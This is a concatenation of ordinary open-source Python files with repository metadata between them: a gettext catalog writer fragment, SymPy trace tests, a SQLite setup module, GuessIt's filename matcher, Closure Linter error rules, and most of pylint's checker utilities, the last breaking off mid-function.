_write_comment(comment)
for comment in message.auto_comments:
_write_comment(comment, prefix='.')
if not no_location:
locs = u' '.join([u'%s:%d' % (filename.replace(os.sep, '/'), lineno)
for filename, lineno in message.locations])
_write_comment(locs, prefix=':')
if message.flags:
_write('#%s\n' % ', '.join([''] + list(message.flags)))
if message.previous_id and include_previous:
_write_comment('msgid %s' % _normalize(message.previous_id[0]),
prefix='|')
if len(message.previous_id) > 1:
_write_comment('msgid_plural %s' % _normalize(
message.previous_id[1]
), prefix='|')
_write_message(message)
_write('\n')
if not ignore_obsolete:
for message in catalog.obsolete.values():
for comment in message.user_comments:
_write_comment(comment)
_write_message(message, prefix='#~ ')
_write('\n')
| lgpl-3.0 |
yashsharan/sympy | sympy/matrices/expressions/tests/test_trace.py | 83 | 2693 | from sympy.core import Lambda, S, symbols
from sympy.concrete import Sum
from sympy.functions import adjoint, conjugate, transpose
from sympy.matrices import eye, Matrix, ShapeError, ImmutableMatrix
from sympy.matrices.expressions import (
Adjoint, Identity, FunctionMatrix, MatrixExpr, MatrixSymbol, Trace,
ZeroMatrix, trace, MatPow, MatAdd, MatMul
)
from sympy.utilities.pytest import raises, XFAIL
n = symbols('n', integer=True)
A = MatrixSymbol('A', n, n)
B = MatrixSymbol('B', n, n)
C = MatrixSymbol('C', 3, 4)
def test_Trace():
assert isinstance(Trace(A), Trace)
assert not isinstance(Trace(A), MatrixExpr)
raises(ShapeError, lambda: Trace(C))
assert trace(eye(3)) == 3
assert trace(Matrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])) == 15
assert adjoint(Trace(A)) == trace(Adjoint(A))
assert conjugate(Trace(A)) == trace(Adjoint(A))
assert transpose(Trace(A)) == Trace(A)
A / Trace(A) # Make sure this is possible
# Some easy simplifications
assert trace(Identity(5)) == 5
assert trace(ZeroMatrix(5, 5)) == 0
assert trace(2*A*B) == 2*Trace(A*B)
assert trace(A.T) == trace(A)
i, j = symbols('i j')
F = FunctionMatrix(3, 3, Lambda((i, j), i + j))
assert trace(F) == (0 + 0) + (1 + 1) + (2 + 2)
raises(TypeError, lambda: Trace(S.One))
assert Trace(A).arg is A
assert str(trace(A)) == str(Trace(A).doit())
def test_Trace_A_plus_B():
assert trace(A + B) == Trace(A) + Trace(B)
assert Trace(A + B).arg == MatAdd(A, B)
assert Trace(A + B).doit() == Trace(A) + Trace(B)
def test_Trace_MatAdd_doit():
# See issue #9028
X = ImmutableMatrix([[1, 2, 3]]*3)
Y = MatrixSymbol('Y', 3, 3)
q = MatAdd(X, 2*X, Y, -3*Y)
assert Trace(q).arg == q
assert Trace(q).doit() == 18 - 2*Trace(Y)
def test_Trace_MatPow_doit():
X = Matrix([[1, 2], [3, 4]])
assert Trace(X).doit() == 5
q = MatPow(X, 2)
assert Trace(q).arg == q
assert Trace(q).doit() == 29
def test_Trace_MutableMatrix_plus():
# See issue #9043
X = Matrix([[1, 2], [3, 4]])
assert Trace(X) + Trace(X) == 2*Trace(X)
def test_Trace_doit_deep_False():
X = Matrix([[1, 2], [3, 4]])
q = MatPow(X, 2)
assert Trace(q).doit(deep=False).arg == q
q = MatAdd(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
q = MatMul(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
def test_trace_constant_factor():
# Issue 9052: gave 2*Trace(MatMul(A)) instead of 2*Trace(A)
assert trace(2*A) == 2*Trace(A)
X = ImmutableMatrix([[1, 2], [3, 4]])
assert trace(MatMul(2, X)) == 10
@XFAIL
def test_rewrite():
assert isinstance(trace(A).rewrite(Sum), Sum)
| bsd-3-clause |
Diaoul/Dobby | dobby/db.py | 1 | 1627 | # Copyright 2011 Antoine Bertin <[email protected]>
#
# This file is part of Dobby.
#
# Dobby is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Dobby is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Dobby. If not, see <http://www.gnu.org/licenses/>.
from models import Base
from models.actions import Action
from models.actions.datetime import Datetime
from models.actions.feed import Feed
from models.actions.weather import Weather
from models.association import Association
from models.command import Command
from models.scenario import Scenario
from sqlalchemy.engine import create_engine
from sqlalchemy.orm import scoped_session
from sqlalchemy.orm.session import sessionmaker
import logging
import os
logger = logging.getLogger(__name__)
def initDb(path):
"""Initialize database (create/update) and returns a sessionmaker to it
:return: a session maker object
:rtype: SessionMaker
"""
logger.info(u'Initializing database')
engine = create_engine('sqlite:///' + path)
if not os.path.exists(path):
logger.debug(u'Database does not exist, creating...')
Base.metadata.create_all(engine)
return sessionmaker(bind=engine)
| lgpl-3.0 |
nomaro/SickBeard_Backup | lib/guessit/matcher.py | 40 | 6496 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2012 Nicolas Wack <[email protected]>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from guessit import PY3, u, base_text_type
from guessit.matchtree import MatchTree
from guessit.textutils import normalize_unicode
import logging
log = logging.getLogger(__name__)
class IterativeMatcher(object):
def __init__(self, filename, filetype='autodetect', opts=None):
"""An iterative matcher tries to match different patterns that appear
in the filename.
The 'filetype' argument indicates which type of file you want to match.
If it is 'autodetect', the matcher will try to see whether it can guess
that the file corresponds to an episode, or otherwise will assume it is
a movie.
The recognized 'filetype' values are:
[ autodetect, subtitle, movie, moviesubtitle, episode, episodesubtitle ]
The IterativeMatcher works mainly in 2 steps:
First, it splits the filename into a match_tree, which is a tree of groups
which have a semantic meaning, such as episode number, movie title,
etc...
The match_tree created looks like the following:
0000000000000000000000000000000000000000000000000000000000000000000000000000000000 111
0000011111111111112222222222222233333333444444444444444455555555666777777778888888 000
0000000000000000000000000000000001111112011112222333333401123334000011233340000000 000
__________________(The.Prestige).______.[____.HP.______.{__-___}.St{__-___}.Chaps].___
xxxxxttttttttttttt ffffff vvvv xxxxxx ll lll xx xxx ccc
[XCT].Le.Prestige.(The.Prestige).DVDRip.[x264.HP.He-Aac.{Fr-Eng}.St{Fr-Eng}.Chaps].mkv
The first 3 lines indicates the group index in which a char in the
filename is located. So for instance, x264 is the group (0, 4, 1), and
it corresponds to a video codec, denoted by the letter'v' in the 4th line.
(for more info, see guess.matchtree.to_string)
Second, it tries to merge all this information into a single object
containing all the found properties, and does some (basic) conflict
resolution when they arise.
"""
valid_filetypes = ('autodetect', 'subtitle', 'video',
'movie', 'moviesubtitle',
'episode', 'episodesubtitle')
if filetype not in valid_filetypes:
raise ValueError("filetype needs to be one of %s" % valid_filetypes)
if not PY3 and not isinstance(filename, unicode):
log.warning('Given filename to matcher is not unicode...')
filename = filename.decode('utf-8')
filename = normalize_unicode(filename)
if opts is None:
opts = []
elif isinstance(opts, base_text_type):
opts = opts.split()
self.match_tree = MatchTree(filename)
mtree = self.match_tree
mtree.guess.set('type', filetype, confidence=1.0)
def apply_transfo(transfo_name, *args, **kwargs):
transfo = __import__('guessit.transfo.' + transfo_name,
globals=globals(), locals=locals(),
fromlist=['process'], level=0)
transfo.process(mtree, *args, **kwargs)
# 1- first split our path into dirs + basename + ext
apply_transfo('split_path_components')
# 2- guess the file type now (will be useful later)
apply_transfo('guess_filetype', filetype)
if mtree.guess['type'] == 'unknown':
return
# 3- split each of those into explicit groups (separated by parentheses
# or square brackets)
apply_transfo('split_explicit_groups')
# 4- try to match information for specific patterns
# NOTE: order needs to comply to the following:
# - website before language (eg: tvu.org.ru vs russian)
# - language before episodes_rexps
# - properties before language (eg: he-aac vs hebrew)
# - release_group before properties (eg: XviD-?? vs xvid)
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps',
'guess_episodes_rexps', 'guess_weak_episodes_rexps' ]
else:
strategy = [ 'guess_date', 'guess_website', 'guess_release_group',
'guess_properties', 'guess_language',
'guess_video_rexps' ]
if 'nolanguage' in opts:
strategy.remove('guess_language')
for name in strategy:
apply_transfo(name)
# more guessers for both movies and episodes
for name in ['guess_bonus_features', 'guess_year']:
apply_transfo(name)
if 'nocountry' not in opts:
apply_transfo('guess_country')
# split into '-' separated subgroups (with required separator chars
# around the dash)
apply_transfo('split_on_dash')
# 5- try to identify the remaining unknown groups by looking at their
# position relative to other known elements
if mtree.guess['type'] in ('episode', 'episodesubtitle'):
apply_transfo('guess_episode_info_from_position')
else:
apply_transfo('guess_movie_title_from_position')
# 6- perform some post-processing steps
apply_transfo('post_process')
log.debug('Found match tree:\n%s' % u(mtree))
def matched(self):
return self.match_tree.matched()
| gpl-3.0 |
markYoungH/chromium.src | third_party/closure_linter/closure_linter/errorrules.py | 124 | 2276 | #!/usr/bin/env python
#
# Copyright 2010 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Linter error rules class for Closure Linter."""
__author__ = '[email protected] (Robert Walker)'
import gflags as flags
from closure_linter import errors
FLAGS = flags.FLAGS
flags.DEFINE_boolean('jsdoc', True,
'Whether to report errors for missing JsDoc.')
flags.DEFINE_list('disable', None,
'Disable specific error. Usage Ex.: gjslint --disable 1,'
'0011 foo.js.')
flags.DEFINE_integer('max_line_length', 80, 'Maximum line length allowed '
'without warning.', lower_bound=1)
disabled_error_nums = None
def GetMaxLineLength():
"""Returns allowed maximum length of line.
Returns:
Length of line allowed without any warning.
"""
return FLAGS.max_line_length
def ShouldReportError(error):
"""Whether the given error should be reported.
Returns:
True for all errors except missing documentation errors and disabled
errors. For missing documentation, it returns the value of the
jsdoc flag.
"""
global disabled_error_nums
if disabled_error_nums is None:
disabled_error_nums = []
if FLAGS.disable:
for error_str in FLAGS.disable:
error_num = 0
try:
error_num = int(error_str)
except ValueError:
pass
disabled_error_nums.append(error_num)
return ((FLAGS.jsdoc or error not in (
errors.MISSING_PARAMETER_DOCUMENTATION,
errors.MISSING_RETURN_DOCUMENTATION,
errors.MISSING_MEMBER_DOCUMENTATION,
errors.MISSING_PRIVATE,
errors.MISSING_JSDOC_TAG_THIS)) and
(not FLAGS.disable or error not in disabled_error_nums))
| bsd-3-clause |
ClovisIRex/Snake-django | env/lib/python3.6/site-packages/pylint/checkers/utils.py | 3 | 29753 | # Copyright (c) 2006-2007, 2009-2014 LOGILAB S.A. (Paris, FRANCE) <[email protected]>
# Copyright (c) 2012-2014 Google, Inc.
# Copyright (c) 2013-2016 Claudiu Popa <[email protected]>
# Copyright (c) 2015 Radu Ciorba <[email protected]>
# Copyright (c) 2015 Dmitry Pribysh <[email protected]>
# Copyright (c) 2016 Ashley Whetter <[email protected]>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
# pylint: disable=W0611
"""some functions that may be useful for various checkers
"""
import collections
import functools
try:
from functools import singledispatch as singledispatch
except ImportError:
# pylint: disable=import-error
from singledispatch import singledispatch as singledispatch
try:
from functools import lru_cache
except ImportError:
from backports.functools_lru_cache import lru_cache
import itertools
import re
import sys
import string
import warnings
import six
from six.moves import map, builtins # pylint: disable=redefined-builtin
import astroid
from astroid import bases as _bases
from astroid import scoped_nodes
BUILTINS_NAME = builtins.__name__
COMP_NODE_TYPES = (astroid.ListComp, astroid.SetComp,
astroid.DictComp, astroid.GeneratorExp)
PY3K = sys.version_info[0] == 3
if not PY3K:
EXCEPTIONS_MODULE = "exceptions"
else:
EXCEPTIONS_MODULE = "builtins"
ABC_METHODS = set(('abc.abstractproperty', 'abc.abstractmethod',
'abc.abstractclassmethod', 'abc.abstractstaticmethod'))
ITER_METHOD = '__iter__'
NEXT_METHOD = 'next' if six.PY2 else '__next__'
GETITEM_METHOD = '__getitem__'
SETITEM_METHOD = '__setitem__'
DELITEM_METHOD = '__delitem__'
CONTAINS_METHOD = '__contains__'
KEYS_METHOD = 'keys'
# Dictionary which maps the number of expected parameters a
# special method can have to a set of special methods.
# The following keys are used to denote the parameters restrictions:
#
# * None: variable number of parameters
# * number: exactly that number of parameters
# * tuple: this are the odd ones. Basically it means that the function
# can work with any number of arguments from that tuple,
# although it's best to implement it in order to accept
# all of them.
_SPECIAL_METHODS_PARAMS = {
None: ('__new__', '__init__', '__call__'),
0: ('__del__', '__repr__', '__str__', '__bytes__', '__hash__', '__bool__',
'__dir__', '__len__', '__length_hint__', '__iter__', '__reversed__',
'__neg__', '__pos__', '__abs__', '__invert__', '__complex__', '__int__',
'__float__', '__neg__', '__pos__', '__abs__', '__complex__', '__int__',
'__float__', '__index__', '__enter__', '__aenter__', '__getnewargs_ex__',
'__getnewargs__', '__getstate__', '__reduce__', '__copy__',
'__unicode__', '__nonzero__', '__await__', '__aiter__', '__anext__',
'__fspath__'),
1: ('__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__',
'__ge__', '__getattr__', '__getattribute__', '__delattr__',
'__delete__', '__instancecheck__', '__subclasscheck__',
'__getitem__', '__missing__', '__delitem__', '__contains__',
'__add__', '__sub__', '__mul__', '__truediv__', '__floordiv__',
'__mod__', '__divmod__', '__lshift__', '__rshift__', '__and__',
'__xor__', '__or__', '__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rmod__', '__rdivmod__', '__rpow__', '__rlshift__', '__rrshift__',
'__rand__', '__rxor__', '__ror__', '__iadd__', '__isub__', '__imul__',
'__itruediv__', '__ifloordiv__', '__imod__', '__ilshift__',
'__irshift__', '__iand__', '__ixor__', '__ior__', '__ipow__',
'__setstate__', '__reduce_ex__', '__deepcopy__', '__cmp__',
'__matmul__', '__rmatmul__', '__div__'),
2: ('__setattr__', '__get__', '__set__', '__setitem__'),
3: ('__exit__', '__aexit__'),
(0, 1): ('__round__', ),
}
SPECIAL_METHODS_PARAMS = {
name: params
for params, methods in _SPECIAL_METHODS_PARAMS.items()
for name in methods
}
PYMETHODS = set(SPECIAL_METHODS_PARAMS)
class NoSuchArgumentError(Exception):
pass
def is_inside_except(node):
"""Returns true if node is inside the name of an except handler."""
current = node
while current and not isinstance(current.parent, astroid.ExceptHandler):
current = current.parent
return current and current is current.parent.name
def get_all_elements(node):
"""Recursively returns all atoms in nested lists and tuples."""
if isinstance(node, (astroid.Tuple, astroid.List)):
for child in node.elts:
for e in get_all_elements(child):
yield e
else:
yield node
def clobber_in_except(node):
"""Checks if an assignment node in an except handler clobbers an existing
variable.
Returns (True, args for W0623) if assignment clobbers an existing variable,
(False, None) otherwise.
"""
if isinstance(node, astroid.AssignAttr):
return (True, (node.attrname, 'object %r' % (node.expr.as_string(),)))
elif isinstance(node, astroid.AssignName):
name = node.name
if is_builtin(name):
return (True, (name, 'builtins'))
else:
stmts = node.lookup(name)[1]
if (stmts and not isinstance(stmts[0].assign_type(),
(astroid.Assign, astroid.AugAssign,
astroid.ExceptHandler))):
return (True, (name, 'outer scope (line %s)' % stmts[0].fromlineno))
return (False, None)
def is_super(node):
"""return True if the node is referencing the "super" builtin function
"""
if getattr(node, 'name', None) == 'super' and \
node.root().name == BUILTINS_NAME:
return True
return False
def is_error(node):
"""return true if the function does nothing but raising an exception"""
for child_node in node.get_children():
if isinstance(child_node, astroid.Raise):
return True
return False
def is_raising(body):
"""return true if the given statement node raise an exception"""
for node in body:
if isinstance(node, astroid.Raise):
return True
return False
builtins = builtins.__dict__.copy()
SPECIAL_BUILTINS = ('__builtins__',) # '__path__', '__file__')
def is_builtin_object(node):
"""Returns True if the given node is an object from the __builtin__ module."""
return node and node.root().name == BUILTINS_NAME
def is_builtin(name):
"""return true if <name> could be considered as a builtin defined by python
"""
return name in builtins or name in SPECIAL_BUILTINS
def is_defined_before(var_node):
"""return True if the variable node is defined by a parent node (list,
set, dict, or generator comprehension, lambda) or in a previous sibling
node on the same line (statement_defining ; statement_using)
"""
varname = var_node.name
_node = var_node.parent
while _node:
if isinstance(_node, COMP_NODE_TYPES):
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.For):
for ass_node in _node.target.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.With):
for expr, ids in _node.items:
if expr.parent_of(var_node):
break
if (ids and
isinstance(ids, astroid.AssignName) and
ids.name == varname):
return True
elif isinstance(_node, (astroid.Lambda, astroid.FunctionDef)):
if _node.args.is_argument(varname):
# If the name is found inside a default value
# of a function, then let the search continue
# in the parent's tree.
if _node.args.parent_of(var_node):
try:
_node.args.default_value(varname)
_node = _node.parent
continue
except astroid.NoDefault:
pass
return True
if getattr(_node, 'name', None) == varname:
return True
break
elif isinstance(_node, astroid.ExceptHandler):
if isinstance(_node.name, astroid.AssignName):
ass_node = _node.name
if ass_node.name == varname:
return True
_node = _node.parent
# possibly multiple statements on the same line using semi colon separator
stmt = var_node.statement()
_node = stmt.previous_sibling()
lineno = stmt.fromlineno
while _node and _node.fromlineno == lineno:
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
for imp_node in _node.nodes_of_class((astroid.ImportFrom, astroid.Import)):
if varname in [name[1] or name[0] for name in imp_node.names]:
return True
_node = _node.previous_sibling()
return False
def is_func_default(node):
"""return true if the given Name node is used in function default argument's
value
"""
parent = node.scope()
if isinstance(parent, astroid.FunctionDef):
for default_node in parent.args.defaults:
for default_name_node in default_node.nodes_of_class(astroid.Name):
if default_name_node is node:
return True
return False
def is_func_decorator(node):
"""return true if the name is used in function decorator"""
parent = node.parent
while parent is not None:
if isinstance(parent, astroid.Decorators):
return True
if (parent.is_statement or
isinstance(parent, (astroid.Lambda,
scoped_nodes.ComprehensionScope,
scoped_nodes.ListComp))):
break
parent = parent.parent
return False
def is_ancestor_name(frame, node):
"""return True if `frame` is a astroid.Class node with `node` in the
subtree of its bases attribute
"""
try:
bases = frame.bases
except AttributeError:
return False
for base in bases:
if node in base.nodes_of_class(astroid.Name):
return True
return False
def assign_parent(node):
"""return the higher parent which is not an AssName, Tuple or List node
"""
while node and isinstance(node, (astroid.AssignName,
astroid.Tuple,
astroid.List)):
node = node.parent
return node
def overrides_a_method(class_node, name):
"""return True if <name> is a method overridden from an ancestor"""
for ancestor in class_node.ancestors():
if name in ancestor and isinstance(ancestor[name], astroid.FunctionDef):
return True
return False
def check_messages(*messages):
"""decorator to store messages that are handled by a checker method"""
def store_messages(func):
func.checks_msgs = messages
return func
return store_messages
class IncompleteFormatString(Exception):
"""A format string ended in the middle of a format specifier."""
pass
class UnsupportedFormatCharacter(Exception):
"""A format character in a format string is not one of the supported
format characters."""
def __init__(self, index):
Exception.__init__(self, index)
self.index = index
def parse_format_string(format_string):
"""Parses a format string, returning a tuple of (keys, num_args), where keys
is the set of mapping keys in the format string, and num_args is the number
of arguments required by the format string. Raises
IncompleteFormatString or UnsupportedFormatCharacter if a
parse error occurs."""
keys = set()
num_args = 0
def next_char(i):
i += 1
if i == len(format_string):
raise IncompleteFormatString
return (i, format_string[i])
i = 0
while i < len(format_string):
char = format_string[i]
if char == '%':
i, char = next_char(i)
# Parse the mapping key (optional).
key = None
if char == '(':
depth = 1
i, char = next_char(i)
key_start = i
while depth != 0:
if char == '(':
depth += 1
elif char == ')':
depth -= 1
i, char = next_char(i)
key_end = i - 1
key = format_string[key_start:key_end]
# Parse the conversion flags (optional).
while char in '#0- +':
i, char = next_char(i)
# Parse the minimum field width (optional).
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the precision (optional).
if char == '.':
i, char = next_char(i)
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the length modifier (optional).
if char in 'hlL':
i, char = next_char(i)
# Parse the conversion type (mandatory).
if PY3K:
flags = 'diouxXeEfFgGcrs%a'
else:
flags = 'diouxXeEfFgGcrs%'
if char not in flags:
raise UnsupportedFormatCharacter(i)
if key:
keys.add(key)
elif char != '%':
num_args += 1
i += 1
return keys, num_args
def is_attr_protected(attrname):
"""return True if attribute name is protected (start with _ and some other
details), False otherwise.
"""
return attrname[0] == '_' and attrname != '_' and not (
attrname.startswith('__') and attrname.endswith('__'))
def node_frame_class(node):
"""return klass node for a method node (or a staticmethod or a
classmethod), return null otherwise
"""
klass = node.frame()
while klass is not None and not isinstance(klass, astroid.ClassDef):
if klass.parent is None:
klass = None
else:
klass = klass.parent.frame()
return klass
def is_attr_private(attrname):
"""Check that attribute name is private (at least two leading underscores,
at most one trailing underscore)
"""
regex = re.compile('^_{2,}.*[^_]+_?$')
return regex.match(attrname)
def get_argument_from_call(callfunc_node, position=None, keyword=None):
"""Returns the specified argument from a function call.
:param astroid.Call callfunc_node: Node representing a function call to check.
:param int position: position of the argument.
:param str keyword: the keyword of the argument.
:returns: The node representing the argument, None if the argument is not found.
:rtype: astroid.Name
:raises ValueError: if both position and keyword are None.
:raises NoSuchArgumentError: if no argument at the provided position or with
the provided keyword.
"""
if position is None and keyword is None:
raise ValueError('Must specify at least one of: position or keyword.')
if position is not None:
try:
return callfunc_node.args[position]
except IndexError:
pass
if keyword and callfunc_node.keywords:
for arg in callfunc_node.keywords:
if arg.arg == keyword:
return arg.value
raise NoSuchArgumentError
def inherit_from_std_ex(node):
"""
Return true if the given class node is subclass of
exceptions.Exception.
"""
if node.name in ('Exception', 'BaseException') \
and node.root().name == EXCEPTIONS_MODULE:
return True
return any(inherit_from_std_ex(parent)
for parent in node.ancestors(recurs=True))
def error_of_type(handler, error_type):
"""
Check if the given exception handler catches
the given error_type.
The *handler* parameter is a node, representing an ExceptHandler node.
The *error_type* can be an exception, such as AttributeError,
the name of an exception, or it can be a tuple of errors.
The function will return True if the handler catches any of the
given errors.
"""
def stringify_error(error):
if not isinstance(error, six.string_types):
return error.__name__
return error
if not isinstance(error_type, tuple):
error_type = (error_type, )
expected_errors = {stringify_error(error) for error in error_type}
if not handler.type:
# bare except. While this indeed catches anything, if the desired errors
# aren't specified directly, then we just ignore it.
return False
return handler.catch(expected_errors)
def decorated_with_property(node):
""" Detect if the given function node is decorated with a property. """
if not node.decorators:
return False
for decorator in node.decorators.nodes:
if not isinstance(decorator, astroid.Name):
continue
try:
if _is_property_decorator(decorator):
return True
except astroid.InferenceError:
pass
return False
def _is_property_decorator(decorator):
for infered in decorator.infer():
if isinstance(infered, astroid.ClassDef):
if infered.root().name == BUILTINS_NAME and infered.name == 'property':
return True
for ancestor in infered.ancestors():
if ancestor.name == 'property' and ancestor.root().name == BUILTINS_NAME:
return True
def decorated_with(func, qnames):
"""Determine if the `func` node has a decorator with the qualified name `qname`."""
decorators = func.decorators.nodes if func.decorators else []
for decorator_node in decorators:
try:
if any(i is not None and i.qname() in qnames for i in decorator_node.infer()):
return True
except astroid.InferenceError:
continue
return False
@lru_cache(maxsize=1024)
def unimplemented_abstract_methods(node, is_abstract_cb=None):
"""
Get the unimplemented abstract methods for the given *node*.
A method can be considered abstract if the callback *is_abstract_cb*
returns a ``True`` value. The check defaults to verifying that
a method is decorated with abstract methods.
The function will work only for new-style classes. For old-style
classes, it will simply return an empty dictionary.
For the rest of them, it will return a dictionary of abstract method
names and their inferred objects.
"""
if is_abstract_cb is None:
is_abstract_cb = functools.partial(
decorated_with, qnames=ABC_METHODS)
visited = {}
try:
mro = reversed(node.mro())
except NotImplementedError:
# Old style class, it will not have a mro.
return {}
except astroid.ResolveError:
# Probably inconsistent hierarchy, don'try
# to figure this out here.
return {}
for ancestor in mro:
for obj in ancestor.values():
infered = obj
if isinstance(obj, astroid.AssignName):
infered = safe_infer(obj)
if not infered:
# Might be an abstract function,
# but since we don't have enough information
# in order to take this decision, we're taking
# the *safe* decision instead.
if obj.name in visited:
del visited[obj.name]
continue
if not isinstance(infered, astroid.FunctionDef):
if obj.name in visited:
del visited[obj.name]
if isinstance(infered, astroid.FunctionDef):
# It's critical to use the original name,
# since after inferring, an object can be something
# else than expected, as in the case of the
# following assignment.
#
# class A:
# def keys(self): pass
# __iter__ = keys
abstract = is_abstract_cb(infered)
if abstract:
visited[obj.name] = infered
elif not abstract and obj.name in visited:
del visited[obj.name]
return visited
def _import_node_context(node):
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, ignores):
return current.parent
return None
def is_from_fallback_block(node):
"""Check if the given node is from a fallback import block."""
context = _import_node_context(node)
if not context:
return False
if isinstance(context, astroid.ExceptHandler):
other_body = context.parent.body
handlers = context.parent.handlers
else:
other_body = itertools.chain.from_iterable(
handler.body for handler in context.handlers)
handlers = context.handlers
has_fallback_imports = any(isinstance(import_node, (astroid.ImportFrom, astroid.Import))
for import_node in other_body)
ignores_import_error = _except_handlers_ignores_exception(handlers, ImportError)
return ignores_import_error or has_fallback_imports
def _except_handlers_ignores_exception(handlers, exception):
func = functools.partial(error_of_type,
error_type=(exception, ))
return any(map(func, handlers))
def node_ignores_exception(node, exception):
"""Check if the node is in a TryExcept which handles the given exception."""
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, astroid.TryExcept):
return _except_handlers_ignores_exception(current.parent.handlers, exception)
return False
def class_is_abstract(node):
"""return true if the given class node should be considered as an abstract
class
"""
for method in node.methods():
if method.parent.frame() is node:
if method.is_abstract(pass_is_abstract=False):
return True
return False
def _supports_protocol_method(value, attr):
try:
attributes = value.getattr(attr)
except astroid.NotFoundError:
return False
first = attributes[0]
if isinstance(first, astroid.AssignName):
if isinstance(first.parent.value, astroid.Const):
return False
return True
def is_comprehension(node):
comprehensions = (astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp)
return isinstance(node, comprehensions)
def _supports_mapping_protocol(value):
return (
_supports_protocol_method(value, GETITEM_METHOD)
and _supports_protocol_method(value, KEYS_METHOD)
)
def _supports_membership_test_protocol(value):
return _supports_protocol_method(value, CONTAINS_METHOD)
def _supports_iteration_protocol(value):
return (
_supports_protocol_method(value, ITER_METHOD)
or _supports_protocol_method(value, GETITEM_METHOD)
)
def _supports_getitem_protocol(value):
return _supports_protocol_method(value, GETITEM_METHOD)
def _supports_setitem_protocol(value):
return _supports_protocol_method(value, SETITEM_METHOD)
def _supports_delitem_protocol(value):
return _supports_protocol_method(value, DELITEM_METHOD)
def _is_abstract_class_name(name):
lname = name.lower()
is_mixin = lname.endswith('mixin')
is_abstract = lname.startswith('abstract')
is_base = lname.startswith('base') or lname.endswith('base')
return is_mixin or is_abstract or is_base
def is_inside_abstract_class(node):
while node is not None:
if isinstance(node, astroid.ClassDef):
if class_is_abstract(node):
return True
name = getattr(node, 'name', None)
if name is not None and _is_abstract_class_name(name):
return True
node = node.parent
return False
def _supports_protocol(value, protocol_callback):
if isinstance(value, astroid.ClassDef):
if not has_known_bases(value):
return True
# classobj can only be iterable if it has an iterable metaclass
meta = value.metaclass()
if meta is not None:
if protocol_callback(meta):
return True
if isinstance(value, astroid.BaseInstance):
if not has_known_bases(value):
return True
if protocol_callback(value):
return True
# TODO: this is not needed in astroid 2.0, where we can
# check the type using a virtual base class instead.
if (isinstance(value, _bases.Proxy)
and isinstance(value._proxied, astroid.BaseInstance)
and has_known_bases(value._proxied)):
value = value._proxied
return protocol_callback(value)
return False
def is_iterable(value):
return _supports_protocol(value, _supports_iteration_protocol)
def is_mapping(value):
return _supports_protocol(value, _supports_mapping_protocol)
def supports_membership_test(value):
supported = _supports_protocol(value, _supports_membership_test_protocol)
return supported or is_iterable(value)
def supports_getitem(value):
return _supports_protocol(value, _supports_getitem_protocol)
def supports_setitem(value):
return _supports_protocol(value, _supports_setitem_protocol)
def supports_delitem(value):
return _supports_protocol(value, _supports_delitem_protocol)
# TODO(cpopa): deprecate these or leave them as aliases?
@lru_cache(maxsize=1024)
def safe_infer(node, context=None):
"""Return the inferred value for the given node.
Return None if inference failed or if there is some ambiguity (more than
one node has been inferred).
"""
try:
inferit = node.infer(context=context)
value = next(inferit)
except astroid.InferenceError:
return
try:
next(inferit)
return # None if there is ambiguity on the inferred node
except astroid.InferenceError:
return # there is some kind of ambiguity
except StopIteration:
return value
def has_known_bases(klass, context=None):
"""Return true if all base classes of a class could be inferred."""
try:
return klass._all_bases_known
except AttributeError:
pass
for base in klass.bases:
result = safe_infer(base, context=context)
# TODO: check for A->B->A->B pattern in class structure too?
if (not isinstance(result, astroid.ClassDef) or
result is klass or
not has_known_bases(result, context=context)):
klass._all_bases_known = False
return False
klass._all_bases_known = True
return True
def is_none(node):
return (node is None or
(isinstance(node, astroid.Const) and node.value is None) or
(isinstance(node, astroid.Name) and node.name == 'None')
)
def node_type(node):
"""Return the inferred type for `node`
If there is more than one possible type, or if inferred type is YES or None,
return None
"""
# check there is only one possible type for the assign node. Else we
# don't handle it for now
types = set()
try:
